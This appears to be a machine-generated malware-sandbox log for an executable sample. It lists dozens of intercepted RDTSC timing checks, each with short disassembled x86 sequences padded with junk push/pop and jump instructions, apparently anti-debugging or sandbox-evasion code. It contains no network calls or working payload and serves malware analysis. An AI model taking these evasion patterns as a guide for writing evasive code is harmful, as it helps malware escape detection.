            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10BA89A second address: 10BA89F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10BE376 second address: 10BE387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF158DB38FBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: FCFE66 second address: FCFEA9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 jmp 00007FF158548897h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FF158548891h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF158548890h 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10E1A1F second address: 10E1A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF158DB38F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push edx 0x0000000e jne 00007FF158DB38F6h 0x00000014 pop edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10E1A34 second address: 10E1A39 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10E1A39 second address: 10E1A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF158DB3907h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FF158DB38F6h 0x00000012 je 00007FF158DB38F6h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10E1A63 second address: 10E1A7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF15854888Eh 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10E1732 second address: 10E1736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10E1736 second address: 10E173A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10E173A second address: 10E1740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10E1740 second address: 10E174B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 10E174B second address: 10E1750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1104CFD second address: 1104D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1104D03 second address: 1104D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110555E second address: 1105564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1105564 second address: 1105568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1105842 second address: 1105846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1105846 second address: 110584A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110584A second address: 1105850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1105850 second address: 1105856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 11071D1 second address: 11071D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 11071D7 second address: 11071DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 11071DD second address: 11071EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF158548886h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 11071EC second address: 11071F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 11071F0 second address: 11071F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 1108871 second address: 1108885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF158DB38FEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110A05F second address: 110A065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110A065 second address: 110A069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110A069 second address: 110A06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110A06F second address: 110A09A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FF158DB38F8h 0x0000000c jmp 00007FF158DB3907h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110A09A second address: 110A0BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF15854888Ch 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c jmp 00007FF15854888Fh 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110CD7C second address: 110CD80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110CD80 second address: 110CD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110CD8A second address: 110CDC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB3909h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FF158DB38FCh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110CDC0 second address: 110CDC6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110D03F second address: 110D043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110D043 second address: 110D047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110D047 second address: 110D090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FF158DB38FCh 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 sbb edx, 3ACF01A2h 0x00000016 mov edx, dword ptr [ebp+122D3B14h] 0x0000001c push dword ptr [ebp+122D380Eh] 0x00000022 sbb dl, FFFFFF92h 0x00000025 push 7675B700h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FF158DB3905h 0x00000033 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110D090 second address: 110D0A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158548891h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110D0A5 second address: 110D0AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FF158DB38F6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110EA60 second address: 110EA65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110EA65 second address: 110EA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110EA6D second address: 110EA77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110E5F1 second address: 110E5FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FF158DB38F6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110E5FB second address: 110E610 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158548891h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110E610 second address: 110E634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jnc 00007FF158DB38F6h 0x00000010 jmp 00007FF158DB38FFh 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110E634 second address: 110E63A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110E63A second address: 110E63E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 110E63E second address: 110E65E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158548896h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 11105BE second address: 11105C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 11105C2 second address: 11105CC instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF158548886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57F06A9 second address: 57F06DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dl 0x00000005 jmp 00007FF158DB3900h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF158DB3907h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57F06DB second address: 57F06FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 59447571h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov edi, 6A7C5130h 0x00000012 mov bx, 505Ch 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movzx esi, bx 0x0000001e popad 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57F06FA second address: 57F071A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB3905h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop ebx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57F071A second address: 57F071E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57F071E second address: 57F0732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, 8ABBh 0x0000000a popad 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov eax, 1D0F5F69h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57B0E82 second address: 57B0E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF15854888Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57B0E92 second address: 57B0EAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF158DB38FDh 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57B0EAA second address: 57B0ED6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158548891h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF15854888Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57B0ED6 second address: 57B0EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57B0EDA second address: 57B0EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57B0EDE second address: 57B0EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57B0EE4 second address: 57B0EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF15854888Bh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830621 second address: 5830638 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB3903h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57B0B73 second address: 57B0B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 movsx edi, si 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cl, bl 0x0000000f call 00007FF15854888Ch 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57B0B90 second address: 57B0BC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB3900h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 movsx ebx, cx 0x00000013 popad 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FF158DB3900h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57B0BC9 second address: 57B0BCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57B0BCF second address: 57B0BD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57B0BD5 second address: 57B0BD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57B0BD9 second address: 57B0C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF158DB3908h 0x00000012 adc eax, 157B9B88h 0x00000018 jmp 00007FF158DB38FBh 0x0000001d popfd 0x0000001e jmp 00007FF158DB3908h 0x00000023 popad 0x00000024 push dword ptr [ebp+0Ch] 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF158DB3907h 0x0000002e rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58303E5 second address: 5830401 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF158548897h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830401 second address: 5830442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FF158DB3904h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FF158DB38FCh 0x00000017 xor eax, 65816078h 0x0000001d jmp 00007FF158DB38FBh 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830442 second address: 5830447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830447 second address: 583044C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 583044C second address: 583045A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 583045A second address: 583045E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 583045E second address: 5830477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158548895h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5800BAB second address: 5800BBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB38FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58503EF second address: 5850413 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 mov bl, C8h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov ax, C641h 0x00000010 mov cl, 85h 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF15854888Bh 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5850413 second address: 5850417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5850417 second address: 585041D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830DCB second address: 5830DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830DD0 second address: 5830DD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830DD6 second address: 5830E05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB3909h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF158DB38FDh 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830E05 second address: 5830E0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830E0B second address: 5830E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830E0F second address: 5830E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830E13 second address: 5830E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movsx edx, ax 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830E23 second address: 5830E6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF158548896h 0x00000008 pushfd 0x00000009 jmp 00007FF158548892h 0x0000000e jmp 00007FF158548895h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830E6F second address: 5830E75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830E75 second address: 5830EA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158548892h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FF158548890h 0x00000010 pop ebp 0x00000011 pushad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
